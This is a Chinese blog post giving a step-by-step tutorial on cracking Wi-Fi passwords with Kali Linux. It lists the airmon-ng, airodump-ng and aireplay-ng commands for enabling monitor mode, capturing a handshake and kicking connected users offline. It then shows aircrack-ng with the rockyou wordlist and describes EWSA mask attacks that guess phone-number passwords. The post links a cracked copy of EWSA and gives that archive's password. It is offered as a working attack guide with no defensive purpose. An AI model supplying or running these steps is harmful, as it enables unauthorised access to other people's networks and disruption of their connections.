使用kali破解wifi密码

如何破解wifi

0x01 准备

  1. kali等操作系统
  2. 支持监听模式的网卡,如RT3070、RTL8187
  3. 信号好的wifi,且该wifi有设备正在连接

0x02 获取握手包

  1. 将网卡连接到虚拟机

  2. 使用iwconfig查看网卡,一般为wlan0

image-20230802154108842

  1. 使用airmon-ng start wlan0开启监听模式

  2. 再次使用iwconfig查看网卡,查看网卡名称是否为wlan0mon

image-20230802154131065

  1. 输入airodump-ng wlan0mon扫描周围wifi信息,PWR越靠近0代表信号越强,下方的部分是连接到wifi的客户端。找到合适的wifi后需要记下CH BSSID

image-20230802154212253

  1. 输入airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/ wlan0mon开始抓包,并将握手包保存到根目录下

image-20230802161515168

  1. 使用aireplay-ng -0 2 -a BSSID -c STATION wlan0mon将用户强制踢下线,用户下线后会自动连接wifi,届时即可抓到握手包。

  2. 当抓到握手包的时候箭头处会显示”handshake“字样

image-20230802161853199

0x03 破解握手包

推荐使用Windows下的ewsa进行破解,也可以使用hashcat等软件,不推荐aircrack。aircrack-ng使用的是cpu进行爆破,我i9-13900hx,给kali分配了4个核,爆破速度也才2000/s,使用4060+cpu+核显的爆破速度为40-45w/s。

aircrack-ng 破解握手包

aircrack-ng '/home/kali/Desktop/1.cap' -w /usr/share/wordlists/rockyou.txt

image-20230802161931608

密码找到后如图所示:

image-20230802162132181

hashcat 破解握手包

没玩明白,请参考https://blog.csdn.net/qq_29176323/article/details/115403581使用显卡+hashcat破解握手包_显卡 跑 cap_千年恨的博客-CSDN博客

EWSA破解握手包

下载地址:EWSA Pro最新版v7.40.821中文注册版 - 哔哩哔哩 (bilibili.com)https://www.bilibili.com/read/cv23936832/

下载地址
链接:https://pan.baidu.com/s/1CJVjaOu8JvoRiEu89gJcmA?pwd=vlj1
提取码:vlj1

解压密码“500W专业跑包”
解压密码“500W专业跑包”
别再问了,消失的眼角膜啊~~~ 作者:LH丶tao https://www.bilibili.com/read/cv23936832/ 出处:bilibili

下载,安装,破解

导入tcpdump数据

导入tcpump数据

点击破解选项

image-20230801155649042

这边着重讲一下掩码破解,?d代表的就是0-9的任意数字,?d(0-3)代表的是0123这四个数字。假如我们要破解8位数字,则掩码为?d?d?d?d?d?d?d?d,例如我们要破解130,131,132,133,134,135,136,137,138,139开头的手机号,则掩码为13?d?d?d?d?d?d?d?d?d

image-20230801155757051

在选项处,选择cpu和gpu后,开始破解,等待爆破出密码

image-20230801154059297

posted @   神丶上单  阅读(820)  评论(2编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· NetPad:一个.NET开源、跨平台的C#编辑器
· PowerShell开发游戏 · 打蜜蜂
· 凌晨三点救火实录:Java内存泄漏的七个神坑,你至少踩过三个!
点击右上角即可分享
微信分享提示